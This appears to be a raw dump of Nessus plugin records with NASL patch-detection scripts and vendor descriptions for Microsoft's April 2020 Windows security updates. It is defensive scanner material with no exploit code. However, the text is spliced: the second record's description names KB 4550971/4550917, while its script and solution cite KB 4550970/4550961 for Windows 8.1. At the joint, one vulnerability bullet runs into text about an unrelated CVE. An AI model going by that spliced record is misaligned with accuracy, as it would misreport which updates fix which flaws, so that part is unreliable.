\"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\"\n );\n script_xref(name:\"MSKB\", value:\"4550957\");\n script_xref(name:\"MSKB\", value:\"4550951\");\n script_xref(name:\"MSFT\", value:\"MS20-4550957\");\n script_xref(name:\"MSFT\", value:\"MS20-4550951\");\n script_xref(name:\"IAVA\", 
value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550957: Windows Server 2008 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550957\nor cumulative update 4550951. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. 
The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1007)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 
(CVE-2020-1000)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\");\n # https://support.microsoft.com/en-us/help/4550957/windows-server-2008-update-kb4550957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e700ec83\");\n # https://support.microsoft.com/en-us/help/4550951/windows-server-2008-update-kb4550951\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e9a49f43\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550957 or Cumulative Update KB4550951.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550951', '4550957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550951, 4550957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 
hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:16:16", "description": "The remote Windows host is missing security update 4550971 or cumulative update 4550917. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. 
(CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. 
The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. 
(CVE-2020-0955)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4550970/windows-8-1-kb4550970\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4550961/windows-8-1-kb4550961\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550970 or Cumulative Update KB4550961.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550961', '4550970');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550961, 4550970])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-06T14:18:03", "description": "The remote Windows host is missing security update 4550965 or cumulative update 4550964. 
It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. 
An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. 
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550965: Windows 7 and Windows Server 2008 R2 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", 
"CVE-2020-0907", "CVE-2020-0938", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550964.NASL", "href": "https://www.tenable.com/plugins/nessus/135472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135472);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0957\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n 
\"CVE-2020-1015\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4550964\");\n script_xref(name:\"MSKB\", value:\"4550965\");\n script_xref(name:\"MSFT\", value:\"MS20-4550964\");\n script_xref(name:\"MSFT\", value:\"MS20-4550965\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550965: Windows 7 and Windows Server 2008 R2 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550965\nor cumulative update 4550964. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in 